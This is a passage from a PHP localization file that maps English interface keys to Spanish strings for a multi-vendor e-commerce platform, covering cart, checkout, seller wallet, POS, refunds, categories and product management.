'reviews' => 'reseñas', 'details_Description' => 'detalles Descripción', 'See_More' => 'Ver más', 'ratings' => 'calificaciones', 'star' => 'estrella', 'product_review_not_available' => 'revisión del producto no disponible', 'see_More' => 'ver más', 'More_from_the_Store' => 'Más de la tienda', 'positive_review' => 'revisión positiva', 'Visit_Store' => 'Visita la tienda', 'contact_With_Seller' => 'contactar con el vendedor', 'send_successfully' => 'enviar con éxito', 'Type_your_message' => 'Escribe tu mensaje', 'send' => 'enviar', 'Go_To_Chatbox' => 'Ir a Chatbox', 'similar_Products_From_Other_Stores' => 'Productos similares de otras tiendas', 'no_similar_products_found' => 'no productos similares encontrados', 'my_order' => 'mi pedido', 'my_profile' => 'mi perfil', 'total' => 'total', 'view_cart' => 'ver carrito', 'go_to_checkout' => 'ir a pagar', 'welcome_message' => 'mensaje de bienvenida', 'business_analytics' => 'Análisis de negocio', 'overall_Statistics' => 'general estadísticas', 'todays_Statistics' => 'Estadísticas de hoy', 'this_Months_Statistics' => 'Estadísticas de este mes', 'out_For_Delivery' => 'Fuera para entrega', 'failed_To_Delivery' => 'error en la entrega', 'seller_Wallet' => 'vendedor Monedero', 'withdrawable_balance' => 'saldo retirable', 'withdraw' => 'retirar', 'pending_Withdraw' => 'A la espera de Retiro', 'total_Commission_given' => 'comisión total dada', 'already_Withdrawn' => 'ya retirado', 'total_delivery_charge_earned' => 'cargo total de entrega ganado', 'total_tax_given' => 'impuesto total dado', 'collected_cash' => 'efectivo recaudado', 'withdraw_Request' => 'petición de retiro', 'amount' => 'cantidad', 'request' => 'pedido', 'earning_statistics' => 'estadísticas ganancias', 'this_Year' => 'este año', 'this_Month' => 'este mes', 'this_Week' => 'esta semana', 'seller' => 'vendedor', 'commission' => 'comisión', 'top_selling_products' => 'Los productos más vendidos', 'sold' => 'vendido', 'most_popular_products' => 'productos más populares', 'top_Delivery_Man' => 'top Repartidor', 'In-house' => 'interno', 'customer' => 'cliente', 'store' => 'almacenar', 'product' => 'producto', 'order' => 'orden', 'brand' => 'marca', 'business' => 'negocio', 'update_your_bank_info_first' => 'actualizar su información bancaria primero', 'warning' => 'advertencia', 'delivery_man' => 'repartidor', 'pos' => 'posición', 'system' => 'sistema', 'failed To Deliver' => 'no se pudo entregar', 'refund_Request_List' => 'Lista de solicitudes de reembolso', 'product_Reviews' => 'Reseñas producto', 'Help_&_Support_Section' => 'Sección ayuda y soporte ', 'delivery-Man' => 'repartidor', 'Reports_&_Analysis' => 'Informes & Análisis', 'Sales_&_Transaction_Report' => 'Informe de ventas y transacciones', 'business_section' => 'sección de negocios', 'shipping_method' => 'Método de envío', 'My_Bank_Info' => 'Mi información bancaria', 'My_Shop' => 'Mi tienda', 'delivery_man_management' => 'gestión repartidor', 'Delivery-Man' => 'Repartidor', 'add_New' => 'añadir Nuevo', 'emergency_Contact' => 'contacto de emergencia', 'copyright' => 'derechos de autor', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'select Logout below if you are ready to end your current session', 'you_have_new order' => 'usted tiene nuevo pedido', 'check_Please' => 'Comprueba, por favor', 'free_delivery' => 'entrega gratis', 'successfully_added!' => '¡Agregado exitosamente!', 'cart_list' => 'lista de carritos', 'Cart_List' => 'Lista de carritos', 'cart' => 'carro', 'Shopping_Details' => 'Compras Detalles', 'payment' => 'pago', 'Shipping_Method' => 'Método de envío', 'choose_shipping_method' => 'elegir método de envío', 'product_details' => 'Detalles de producto', 'qty' => 'cantidad', 'unit_price' => 'precio unitario', 'discount' => 'descuento', 'Unit_Price' => 'Precio unitario', 'order_note' => 'nota de pedido', 'Optional' => 'Opcional', 'Order_Summary' => 'Orden Resumen', 'Item_Price' => 'Precio del articulo', 'Product_Discount' => 'Producto descuento', 'Promo_Code' => 'Código promocional', 'write_coupon_code_here' => 'escriba cupón código aquí', 'apply' => 'aplicar', 'Sub_total' => 'parciales totales', 'tax' => 'impuesto', 'shipping' => 'envío', 'Continue_Shopping' => 'Seguir comprando', 'Proceed_to_Next' => 'Proceder a Siguiente', 'minimum_order_quantity_cannot_be_less_than_' => 'cantidad de pedido mínimo no puede ser menor de ', 'Item_has_been_removed_from_cart ' => 'Item has been removed from cart ', 'select_shipping_method_first' => 'seleccione el método de envío primero', 'Item_has_been_removed_from_cart' => 'Artículo ha sido removido del carrito', 'Shipping_Details' => 'Detalles de envío', 'Delivery_Information_Details' => 'Información de entrega Detalles', 'Delivery_Address' => 'Dirección de entrega', 'Set_Form_Map' => 'Establecer Forma Mapa', 'Select_From_Saved' => 'Seleccionar de guardado', 'search_your_location_here' => 'busca tu ubicación aquí', 'search_here' => 'busca aquí', 'Saved_Addresses' => 'Direcciones guardadas', 'Contact_Person_Name' => 'Nombre del Contacto', 'Address_Type' => 'Tipo de dirección', 'Permanent' => 'Permanente', 'Others' => 'Otros', 'Country' => 'País', 'city' => 'ciudad', 'Zip_Code' => 'Código postal', 'address' => 'DIRECCIÓN', 'your_address' => 'su dirección', 'Save_this_Address' => 'Guardar esta dirección', 'Billing_Address' => 'Dirección de Envio', 'Same_as_Delivery_Address' => 'Misma que dirección de entrega', 'Type' => 'Tipo', 'Update_this_Address' => 'Actualizar esta dirección', 'Payment_Details' => 'Detalles del pago', 'Payment_Information' => 'Información del pago', 'Cash_on_Delivery' => 'Contrareembolso', 'Digital_Payment' => 'Pago digital', 'wallet_payment' => 'monedero pago', 'your_current_balance' => 'su saldo actual', 'order_amount' => 'Total de la orden', 'remaining_balance' => 'balance restante', 'you_do_not_have_sufficient_balance_for_pay_this_order' => 'usted no tiene saldo suficiente para pagar este pedido', 'Error' => 'Error', 'Redirecting_to_the_payment' => 'Redirigir al pago', 'Order_Placed' => 'Pedido realizado', 'Order Placed' => 'Pedido realizado', 'thanks_for_the_order' => 'gracias por el pedido', 'Your_order_ID' => 'ID de tu pedido', 'seller_details' => 'vendedor detalles', 'payment_details' => 'Detalles del pago', 'Ordered_Items' => 'Artículos pedidos', 'Unit_price' => 'Precio unitario', 'QTY' => 'CANTIDAD', 'Total' => 'Totalizar', 'sub_total' => 'total parcial', 'coupon_discount' => 'cupón descuento', 'discount_on_product' => 'descuento en producto', 'You_can_track_your_order_by_clicking_the_below_button' => 'Puede seguir su pedido haciendo clic en el botón abajo ', 'track_your_order' => 'rastrea tu orden', 'website' => 'sitio web', 'Order_Complete' => 'Orden completada', 'Your_Order_is_Completed' => 'Su pedido es completo', 'thank_you_for_your_order' => 'Gracias por su orden', 'your_order_is_being_processed_and_will_be_completed_within_3-6_hours.' => 'su pedido está procesándose y se completará en 3-6 horas.', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'usted recibirá una confirmación por correo electrónico cuando su pedido se completa.', 'Track_Order' => 'Orden de pista', 'category' => 'categoría', 'Sort_by' => 'Ordenar por', 'default' => 'por defecto', 'High_to_Low_Price' => 'Precio alto al bajo', 'Low_to_High_Price' => 'Precio bajo a alto', 'A_to_Z_Order' => 'Pedido A a Z', 'Z_to_A_Order' => 'Z a un pedido', 'Show_Product' => 'Mostrar Producto', 'Choose_Option' => 'Elegir Opción', 'Best_Selling' => 'Más vendido', 'Top_Rated' => 'Los más valorados', 'Most_Favorite' => 'Mas favorito', 'Categories' => 'Categorías', 'More_Categories' => 'Más Categorías', 'Brands' => 'Marcas', 'More_Brands' => 'Más Marcas', 'Ratings' => 'Calificaciones', 'Price' => 'Precio', 'Min' => 'mínimo', 'Max' => 'máx.', 'Grid_View' => 'Vista en cuadrícula', 'List_View' => 'Vista de la lista', 'No_Product_Found' => 'Ningún producto encontrado', 'add_to_compare' => 'Añadir a comparar', 'Shop_Page' => 'Página de la tienda', 'Followers' => 'Seguidores', 'Reviews' => 'Reseñas', 'Orders' => 'Pedidos', 'Positive_Review' => 'Revisión positiva', 'Products' => 'productos', 'Chat_with_Seller' => 'Chatear con la vendedora', 'Want_to_unfollow_this_shop' => 'Quiero dejar de seguir esta tienda', 'Follow' => 'Seguir', 'Search_Product' => 'Buscar producto', 'Item' => 'Artículo', 'Quick_View' => 'Vista rápida', 'Unfollow' => 'Dejar de seguir', 'follow_successfully' => 'seguir con éxito', 'follow' => 'seguir', 'unfollow_successfully' => 'dejar de seguir con éxito', 'View_style_updated' => 'Ver estilo actualizado', 'best-selling' => 'más vendido', 'latest' => 'el último', 'Product_has_been_added_to_Compare_list' => 'Producto has agregado a la lista de comparación', 'Product has been added to wishlist' => 'El producto ha sido agregado a la lista de deseos', 'color' => 'color', 'type' => 'tipo', 'My_Wishlists' => 'Mi lista de deseos', 'want_to_delete_this_account ' => 'quiero eliminar esta cuenta', 'Delete_My_Account' => 'Borrar mi cuenta', 'Joined' => 'Unido', 'My_profile' => 'Mi perfil', 'Wish_List' => 'Lista de deseos', 'Compare_List' => 'Comparar Lista', 'Wallet' => 'Billetera', 'Loyalty_Point' => 'Punto de lealtad', 'Inbox' => 'Bandeja de entrada', 'want_to_clear_all_wishlist ' => 'want to clear all wishlist', 'Clear_All' => 'Limpiar todo', 'My_Wish_List' => 'Mi lista de deseos', 'price' => 'precio', 'not_found_anything' => 'no encontro nada', 'My_Compare_List' => 'Mi comparar lista', 'want_to_clear_all_compare_list ' => 'want to clear all compare list', 'want_to_delete_this_item' => 'quiero to eliminar este elemento', 'remove' => 'eliminar', 'Product_Name' => 'Nombre del producto', 'Brand' => 'Marca', 'My_Profile' => 'Mi perfil', 'Personal_Details' => 'Detalles personales', 'Edit_Profile' => 'Editar perfil', 'Phone' => 'Teléfono', 'Email' => 'Correo electrónico', 'My_Addresses' => 'Mis direcciones', 'Add_Address' => 'Añadir dirección', 'permanent' => 'permanente', 'Shipping_Address' => 'Dirección de envío', 'want_to_delete_this_address ' => 'quiero eliminar esta dirección', 'Name' => 'Nombre', 'Address' => 'DIRECCIÓN', 'others' => 'otros', 'Edit_Personal_Details' => 'Editar detalles personales', 'Go_back' => 'Regresa', 'Ex: 01xxxxxxxxx' => 'Ej: 01xxxxxxxxx', 'Password' => 'Contraseña', 'Ex:_6+ character' => 'Ejemplo: 6+ carácter', 'Attachment' => 'Adjunto', 'change_your_profile' => 'cambia tu perfil', 'Image_ratio_should_be' => 'Image ratio should be', 'Reset' => 'Reiniciar', 'Update_Profile' => 'Actualización del perfil', 'Please_ReType_Password' => 'Por favor Reescribe contraseña', 'Passwords_do_not_match' => 'Las contraseñas no coinciden', 'password_Must_Be_6_Character' => 'la contraseña debe tener 6 caracteres', 'Passwords_match' => 'Las contraseñas coinciden', 'updated_successfully' => 'actualizado con éxito', 'Your_account_deleted_successfully!!' => 'Your account deleted successfully!!', 'overall_statistics' => 'estadísticas generales', 'total_Sale' => 'Venta total', 'total_Stores' => 'total Tiendas', 'total_Products' => 'productos totales', 'total_Customers' => 'total clientes', 'failed_to_delivery' => 'entrega fallida', 'admin_wallet' => 'billetera de administrador', 'in-house_earning' => 'ingresos internos', 'commission_earned' => 'comisión ganada', 'delivery_charge_earned' => 'cargo de entrega ganado', 'total_tax_collected' => 'impuesto total recaudado', 'pending_amount' => 'monto pendiente', 'in-house' => 'interno', 'top_customer' => 'mejor cliente', 'most_Popular_Stores' => 'tiendas más populares', 'top_selling_store' => 'tienda superventas', 'profile_Settings' => 'configuración de perfil', 'nav_menu' => 'menú navegación', 'basic_Information' => 'información básica', 'full_name' => 'nombre completo', 'display_name' => 'nombre para mostrar', 'your_first_name' => 'su nombre', 'optional' => 'opcional', 'enter_new_email_address' => 'ingresar nueva dirección de correo electrónico', 'profile_Image' => 'imagen de perfil', 'ratio' => 'relación', 'image_Upload' => 'imagen Subir', 'save_changes' => 'guardar cambios', 'change_your_password' => 'cambia tu contraseña', 'new_password' => 'Nueva contraseña', 'enter_new_password' => 'Introduzca nueva contraseña', 'confirm_password' => 'confirmar Contraseña', 'confirm_your_new_password' => 'Confirma tu nueva contraseña', 'profile_updated_successfully' => 'perfil actualizado con éxito', 'product_Section' => 'sección producto', 'all_Categories' => 'todas las categorias', 'search_by_name' => 'buscar por nombre', 'billing_Section' => 'sección facturación', 'walking_customer' => 'caminando cliente', 'current_customer' => 'cliente actual', 'clear_cart' => 'vaciar carrito', 'new_order' => 'Nuevo orden', 'item' => 'artículo', 'product_Discount' => 'descuento producto', 'extra_Discount' => 'descuento extra', 'coupon_Discount' => 'cupón descuento', 'paid_By' => 'pagado por', 'cash' => 'dinero', 'card' => 'tarjeta', 'cancel_Order' => 'cancelar orden', 'place_Order' => 'realizar pedido', 'update_discount' => 'actualizar descuento', 'percent' => 'por ciento', 'coupon_code' => 'Código promocional', 'update_tax' => 'actualizar impuestos', 'short_cut_keys' => 'teclas de atajo', 'to_click_order' => 'hacer clic encargar', 'to_click_payment_submit' => 'hacer clic pago enviar', 'to_close_payment_submit' => 'para cerrar pago enviar', 'to_click_cancel_cart_item_all' => 'hacer clic en borrar carrito', 'to_click_add_new_customer' => 'para hacer clic en agregar nuevo cliente', 'to_submit_add_new_customer_form' => 'para enviar el formulario de agregar nuevo cliente', 'to_click_short_cut_keys' => 'para hacer clic en las teclas de acceso directo', 'to_print_invoice' => 'para imprimir factura', 'to_cancel_invoice' => 'para cancelar factura', 'to_focus_search_input' => 'para enfocar la entrada de búsqueda', 'to_click_extra_discount' => 'to click extra descuento', 'to_click_coupon_discount' => 'to click coupon descuento', 'to_click_clear_cart' => 'hacer clic en borrar carrito', 'to_click_new_order' => 'hacer clic nuevo pedido', 'add_new_customer' => 'agregar nuevo cliente', 'first_name' => 'nombre de pila', 'last_name' => 'apellido', 'ex' => 'ex', 'country' => 'país', 'zip_code' => 'código postal', 'no' => 'No', 'yes' => 'Sí', 'extra_discount_added_successfully' => 'descuento extra agregado con éxito', 'your_cart_is_empty' => 'Tu carrito esta vacío', 'this_discount_is_not_applied_for_this_amount' => 'este descuento no se aplica para esta cantidad', 'amount_can_not_be_negative_or_zero' => 'cantidad no puede ser negativa o cero', 'coupon_added_successfully' => 'cupón agregado con éxito', 'coupon_is_invalid' => 'cupón es inválido', 'selected' => 'seleccionado', 'product_already_added_in_cart' => 'producto ya agregado en carrito', 'sorry_product_is_out_of_stock.' => 'lo siento el producto está agotado.', 'item_has_been_added_in_your_cart' => 'el artículo ha sido agregado a su carrito', 'item_has_been_removed_from_cart' => 'artículo ha sido removido del carrito', 'you_want_to_remove_all_items_from_cart' => 'desea eliminar todos los artículos del carrito', 'product_quantity_is_not_enough' => 'producto cantidad no suficiente', 'product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'Product quantity can not be zero or less than zero in cart', 'product_quantity_updated' => 'producto cantidad actualizado', 'description' => 'descripción', 'total_Price' => 'precio total', 'tax_included' => 'impuesto incluido', 'customer_added_successfully' => 'cliente agregado con éxito', 'order_placed_successfully' => 'pedido realizado con éxito', 'print_Invoice' => 'imprimir factura', 'proceed' => 'proceder', 'if_thermal_printer_is_ready' => 'si la impresora térmica está lista', 'order_ID' => 'Solicitar ID', 'customer_Name' => 'Nombre del cliente', 'DESC' => 'DESC', 'variation' => 'variación', 'items_Price' => 'artículos precio', 'VAT' => 'IVA', 'subtotal' => 'total parcial', 'extra_discount' => 'descuento extra', 'paid_by' => 'pagado por', 'THANK_YOU' => 'GRACIAS', 'order_List' => 'lista de orden', 'select_Date_Range' => 'seleccionar rango de fechas', 'in_House' => 'en casa', 'start_Date' => 'fecha de inicio', 'end_Date' => 'fecha final', 'show_data' => 'mostrar datos', 'search_by_Order_ID' => 'buscar por ID de pedido', 'search' => 'buscar', 'export' => 'exportar', 'excel' => 'sobresalir', 'order_Date' => 'fecha de orden', 'customer_Info' => 'Información del cliente', 'total_Amount' => 'cantidad total', 'order_Status' => 'orden estado', 'paid' => 'pagado', 'view' => 'vista', 'invoice' => 'factura', 'invalid_customer_data' => 'datos cliente inválidos', 'unpaid' => 'no pagado', 'failed_to_deliver' => 'falla en entregar', 'order_filter_success' => 'éxito del filtro de pedidos', 'invalid_date_range' => 'rango de fechas inválido', 'order_Details' => 'Detalles del pedido', 'payment_Method' => 'método de pago', 'reference_Code' => 'código de referencia', 'payment_Status' => 'estado de pago', 'item_Details' => 'detalles del artículo', 'variations' => 'variaciones', 'customer_information' => 'Información al cliente', 'location_Data' => 'datos de localización', 'are_you_sure_change_this' => 'estás seguro de cambiar esto', 'yes_change_it' => 'sí cambiar es', 'status_change_successfully' => 'cambio de estado exitoso', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'pedido ya entregado y cantidad de transacción ha sido desembolsado cambiando estado puede ser la razón de un error de cálculo', 'think_before_you_proceed' => 'piensa antes de proceder', 'order_is_already_delivered_you_can_not_change_it' => 'pedido ya es entregado no puedes cambiarlo', 'delivery_man_successfully_assigned_or_changed' => 'repartidor exitosamente asignado o cambiado', 'deliveryman_can_not_assign_or_change_in_that_status' => 'repartidor no puede asignar o cambiar en ese estado', 'add_valid_data' => 'agregar datos válidos', 'only_available_when_order_is_out_for_delivery' => 'solo disponible cuando el pedido está fuera para entrega', 'waiting_for_location' => 'esperando ubicación', 'order_Invoice' => 'pedido factura', 'shop_Name' => 'Nombre de tienda', 'date' => 'fecha', 'customer_info' => 'Información del cliente', 'item_description' => 'Descripción del Artículo', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'Si necesita ayuda o tiene comentarios o sugerencias sobre nuestro sitio, puede enviarnos un correo electrónico a', 'all_copy_right_reserved_©_2023_' => 'todos derechos de copia reservados © 2023 ', 'out for delivery' => 'Fuera para entrega', 'linked_orders' => 'pedidos vinculados', 'show_locations_on_map' => 'mostrar ubicaciones en mapa', 'cash_on_delivery' => 'contrareembolso', 'item Details' => 'detalles del artículo', 'order_&_Shipping_Info' => 'información de pedido y envío', 'order_status' => 'estado pedido', 'shipping_type' => 'tipo de envío', 'category wise' => 'categoría sabia', 'choose_delivery_type' => 'elegir entrega tipo', 'by_self_delivery_man' => 'por self delivery man', 'by_third_party_delivery_service' => 'por servicio de entrega de terceros', 'choose_delivery_man' => 'elegir repartidor', 'select' => 'seleccionar', 'deliveryman_will_get' => 'repartidor will get', 'expected_delivery_date' => 'Fecha de Entrega Estimada', 'delivery_service_name' => 'nombre del servicio de entrega', 'tracking_id' => 'ID de rastreo', 'shipping_address' => 'Dirección de envío', 'contact' => 'contacto', 'billing_address' => 'Dirección de Envio', 'shop_Information' => 'tienda Información', 'orders_Served' => 'pedidos servidos', 'update_third_party_delivery_info' => 'actualizar información de entrega de terceros', 'account_has_been_deleted_you_can_not_change_the_status' => 'cuenta ha sido eliminado usted no puede cambiar el estado', 'before_delivered_you_need_to_make_payment_status_paid' => 'antes de entregado usted necesita hacer estado de pago pagado', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'repartidor hombre no puede asignar o cambiar en ese estado', 'deliveryman_charge_add_successfully' => 'cargo de repartidor agregar con éxito', 'failed_to_add_deliveryman_charge' => 'error en agregar repartidor cargo', 'order wise' => 'orden sabio', 'shipping_Method' => 'Método de envío', 'order wise shipping' => 'orden de envío inteligente', 'shipping_to' => 'embarcar hacia', 'Order' => 'Orden', 'reund_requests' => 'reund requests', 'pending_Refund_Requests' => 'solicitudes de reembolso pendientes', 'search_by_order_id_or_refund_id' => 'buscar por order id or refund id', 'inhouse_orders_only' => 'inhouse orders only', 'order_id' => 'Solicitar ID', 'product_info' => 'información del producto', 'total_amount' => 'cantidad total', 'refund_status' => 'reembolso estado', 'refund_details' => 'reembolso detalles', 'refund_id' => 'reembolso id', 'change_refund_status' => 'cambiar el estado del reembolso', 'total_discount' => 'Descuento total', 'total_tax' => 'total impuestos', 'total_refund_amount' => 'monto reembolso total', 'additional_information' => 'información adicional', 'seller_info' => 'información del vendedor', 'seller_name' => 'Nombre del vendedor', 'seller_email' => 'vendedor email', 'seller_phone' => 'vendedor teléfono', 'deliveryman_info' => 'repartidor info', 'deliveryman_name' => 'nombre repartidor', 'not_assigned' => 'no asignado', 'deliveryman_email' => 'repartidor email', 'not_found' => 'extraviado', 'deliveryman_phone' => 'repartidor teléfono', 'payment_method' => 'método de pago', 'order_details' => 'detalles del pedido', 'click_here' => 'haga clic aquí', 'customer_details' => 'Detalles del cliente', 'refund_status_changed_log' => 'registro de cambio de estado de reembolso', 'changed_by' => 'cambiado por', 'note' => 'nota', 'no_data_to_show' => 'no hay datos para mostrar', 'refund_reason' => 'reembolso motivo', 'attachment' => 'adjunto', 'approved_note' => 'nota aprobada', 'rejected_note' => 'nota rechazada', 'digitally_paid' => 'pagado digitalmente', 'customer_wallet' => 'billetera cliente', 'payment_info' => 'información de pago', 'you_want_to_change_refund_status' => 'desea cambiar el estado del reembolso', 'refund_status_updated_successfully' => 'estado de reembolso actualizado con éxito', 'it_is_already_refunded_you_can_not_change_it' => 'ya se reembolsó no puede cambiarlo', 'refund_status_updated' => 'estado reembolso actualizado', 'category_Name' => 'nombre de la categoría', 'new_Category' => 'nueva categoría', 'priority' => 'prioridad', 'the_lowest_number_will_get_the_highest_priority' => 'el número más bajo obtendrá la prioridad más alta', 'set_Priority' => 'fijar prioridad', 'category_Logo' => 'categoría Logotipo', 'choose_File' => 'Elija el archivo', 'reset' => 'reiniciar', 'category_list' => 'Lista de categoría', 'category_Image' => 'categoría Imagen', 'home_category_status' => 'estado de la categoría de la casa', 'edit' => 'editar', 'yes_delete_it' => 'si borrarlo', 'category_deleted_successfully.' => 'categoría eliminado con éxito.', 'Category_added_successfully' => 'Categoría añadida con éxito', 'category_form' => 'formulario categoría', 'Category_updated_successfully' => 'Categoría actualizada con éxito', 'sub_Category' => 'subcategoría', 'sub_Category_Setup' => 'configuración sub categoría', 'sub_category_name' => 'nombre de la subcategoría', 'new_Sub_Category' => 'nueva sub categoría', 'main_Category' => 'categoria principal', 'select_main_category' => 'seleccionar categoría principal', 'sub_category_Logo' => 'sub categoría Logotipo', 'sub_category_list' => 'lista de subcategorías', 'search_by_Sub_Category' => 'buscar por sub categoría', 'sub_category_Image' => 'sub categoría Imagen', 'are_you_sure_to_delete_this_sub_category' => 'está seguro de eliminar esta sub categoría', 'sub_Category_deleted_Successfully.' => 'sub categoría eliminada con éxito.', 'category_updated_successfully' => 'categoría actualizada con éxito', 'sub' => 'sub', 'sub_Sub_Category' => 'sub Sub categoría', 'sub_Sub_Category_Setup' => 'sub Configuración de subcategoría', 'sub_sub_category_name' => 'nombre de la sub subcategoría', 'new_Sub_Sub_Category' => 'nueva Sub Sub categoría', 'sub_category_Name' => 'subcategoría Nombre', 'sub_sub_category_list' => 'lista de sub subcategorías', 'search_by_Sub_Sub_Category' => 'buscar por Sub Sub Categoría', 'you_wont_be_able_to_revert_this' => 'usted no podrá revertir esto', 'sub_Sub_Category_Deleted_Successfully' => 'sub Sub Categoría Eliminado Con Éxito', 'Sub_Sub_Category_updated_successfully' => 'Sub subcategoría actualizada con éxito', 'sub_Sub' => 'sub Sub', 'brand_Add' => 'marca Agregar', 'brand_Setup' => 'marca Configuración', 'brand_Name' => 'nombre de la marca', 'LUX' => 'LUX', 'brand_Logo' => 'logotipo', 'choose_file' => 'Elija el archivo', 'are_you_sure ' => 'Are you sure ', 'brand_deleted_successfully' => 'marca eliminada con éxito', 'brand_added_successfully' => 'marca añadida con éxito', 'brand_List' => 'marca Lista', 'total_Product' => 'producto total', 'total_Order' => 'orden total', 'are_you_sure_delete_this_brand' => 'estás seguro de borrar esta marca', 'status_updated_failed.' => 'estado actualizado fallido.', 'Product_must_be_approved' => 'Producto debe ser aprobado', 'brand_Edit' => 'marca Editar', 'brand_Update' => 'actualización de marca', 'Image uploaded successfully' => 'Imagen cargada con éxito', 'Error Something went wrong' => 'ErrorAlgo salió mal', 'Choose Image' => 'Elegir imagen', 'Close' => 'Cerca', 'Add' => 'Agregar', 'brand_updated_successfully' => 'marca actualizada con éxito', 'attribute' => 'atributo', 'attribute_Setup' => 'atributo Configuración', 'add_new_attribute' => 'agregar nuevo atributo', 'attribute_Name' => 'Nombre del Atributo', 'enter_Attribute_Name' => 'ingrese nombre del atributo', 'attribute_list' => 'lista atributos', 'search_by_Attribute_Name' => 'buscar por nombre del atributo', 'you_will not_be_able_to_revert_this' => 'usted no podrá revertir esto', 'attribute_deleted_successfully' => 'atributo eliminado con éxito', 'attribute_added_successfully' => 'atributo agregado con éxito', 'update_attribute' => 'actualizar atributo', 'attribute_updated_successfully' => 'atributo actualizado con éxito', 'product_List' => 'lista de productos', 'in_House_Product_List' => 'en la lista de productos de la casa', 'search_Product_Name' => 'buscar Nombre del producto', 'limited_Sotcks' => 'calcetines limitados', 'add_New_Product' => 'añadir nuevo producto', 'product Name' => 'nombre del producto', 'product Type' => 'tipo de producto', 'purchase_price' => 'precio de compra', 'selling_price' => 'precio de venta', 'show_as_featured' => 'mostrar como presentado', 'active_status' => 'estado activo', 'physical' => 'físico', 'barcode' => 'código de barras', 'Status_updated_failed.' => 'Estado actualizado fallido.', 'featured_status_updated_successfully' => 'estado presentado actualizado con éxito', 'product_Add' => 'producto Añadir', 'general_Info' => 'información general', 'product_type' => 'tipo de producto', 'digital' => 'dígito', 'digital_product_type' => 'tipo de producto digital', 'ready_After_Sell' => 'listo después de vender', 'ready_Product' => 'producto listo', 'ready_product_upload' => 'carga de producto listo', 'product_code_sku' => 'código producto sku', 'generate_code' => 'generar codigo', 'unit' => 'unidad', 'colors' => 'colores', 'attributes' => 'atributos', 'product_price_&_stock' => 'producto precio & existencias', 'tax_Model' => 'modelo de impuestos', 'include' => 'incluir', 'exclude' => 'excluir', 'discount_Type' => 'tipo descuento', 'flat' => 'departamento', 'total_Quantity' => 'cantidad total', 'minimum_order_quantity' => 'Cantidad mínima de pedido', 'shipping_cost' => 'costo de envío', 'shipping_cost_multiply_with_quantity' => 'gastos de envio multiplicados por la cantidad', 'tags' => 'etiquetas', 'search_tags' => 'etiquetas de búsqueda', 'seo_section' => 'sección seo', 'meta_Title' => 'meta título', 'meta_Description' => 'Metadescripción', 'meta_Image' => 'meta Imagen', 'youtube_video_link' => 'enlace de vídeo de youtube', 'optional_please_provide_embed_link_not_direct_link' => 'opcional favor proporcionar incrustar enlace no enlace directo', 'upload_product_images' => 'subir imágenes de productos', 'upload_thumbnail' => 'subir miniatura', 'please_only_input_png_or_jpg_type_file' => 'por favor solo ingrese el tipo de archivo png o jpg', 'file_size_too_big' => 'archivo tamaño demasiado grande', 'choice_Title' => 'elección título', 'enter_choice_values' => 'introducir valores de elección', 'want_to_add_this_product' => 'quiero agregar este producto', 'product_added_successfully' => 'producto agregado con éxito', 'Select' => 'Seleccionar', 'product_Edit' => 'producto Editar', 'new_Product' => 'nuevo producto', 'generate' => 'generar', 'purchese_price' => 'precio de compra', 'discount_type' => 'descuento tipo', 'you_can_not_delete_all_images' => 'no puedes borrar todas las imagenes', 'generate_Sitemap' => 'generar mapa del sitio', 'download_Generate_Sitemap' => 'descargar Generar mapa del sitio', 'product_Preview' => 'vista previa del producto', 'view_from_website' => 'ver desde sitio web', 'of' => 'de', 5 => '5', 4 => '4', 3 => '3', 2 => '2', 1 => '1', 'TAX' => 'IMPUESTO', 'shipping Cost' => 'costo de envío', 'current_Stock' => 'existencias actuales', 'product_Image' => 'Imagen del producto', 'reviewer' => 'crítico', 'review' => 'revisar', 'analytics_script' => 'guión analítico', 'pixel_analytics_your_pixel_id' => 'análisis de píxeles su identificación de píxel', 'pixel_analytics_your_pixel_id_from_facebook' => 'análisis de píxeles su identificación de píxel de facebook', 'google_tag_manager_id' => 'identificador de google tag manager', 'google_tag_manager_script_id_from_google' => 'google tag manager script id de google', 'generate_barcode' => 'generar código de barras', 'maximum_quantity_270' => 'cantidad máxima 270', 'print' => 'imprimir', 'this_page_is_for_A4_size_page_printer_so_it_will_not_be_visible_in_smaller_devices.' => 'esta página es para impresora de páginas de tamaño A4, por lo que no será visible en dispositivos más pequeños.', 'product_Bulk_Import' => 'Importación a granel del producto', 'bulk_Import' => 'importación masiva', 'instructions' => 'instrucciones', 'download_the_format_file_and_fill_it_with_proper_data.' => 'descargue el archivo de formato y llénelo con los datos adecuados.', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'puede descargar el archivo de ejemplo para comprender cómo los datos deben llenarse.', 'once_you_have_downloaded_and_filled_the_format_file' => 'una vez que haya descargado y llenado el archivo de formato', 'upload_it_in_the_form_below_and_submit.' => 'subirlo en el formulario debajo y enviar.', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'después de cargar productos necesita editarlos y establecer imágenes y opciones de productos.', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'usted puede obtener marca y categoría id de su lista por favor ingrese los id correctos.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'puede cargar las imágenes de su producto en la carpeta del producto desde la galería y copiar la ruta de la imagen.', 'do_not_have_the_template' => 'no tiene la plantilla', 'download_here' => 'descarga aquí', 'products_imported_successfully' => 'productos importados con éxito', 'updated_product_list' => 'lista de productos actualizada', 'update_product' => 'actualizar producto', 'product_table' => 'producto tabla', 'previous_shipping_cost' => 'costo de envio anterior', 'new_shipping_cost' => 'nuevo coste envio', 'seller_Product_List' => 'vendedor Lista de productos', 'approve' => 'aprobar', 'deny' => 'denegar', 'denied_note' => 'nota negada', 'banner' => 'bandera', 'banner_form' => 'forma de pancarta', 'banner_type' => 'tipo banner', 'main_Banner' => 'banner principal', 'footer_Banner' => 'pie de página Banner', 'popup_Banner' => 'pancarta emergente', 'main_Section_Banner' => 'banner de la sección principal', 'header_Banner' => 'encabezado Banner', 'sidebar_Banner' => 'barra lateral Banner', 'top_Side_Banner' => 'Banner lateral superior', 'banner_URL' => 'URL de banner', 'Enter_url' => 'Introducir URL', 'resource_type' => 'tipo de recurso', 'shop' => 'comercio', 'image' => 'imagen', 'banner_table' => 'mesa de 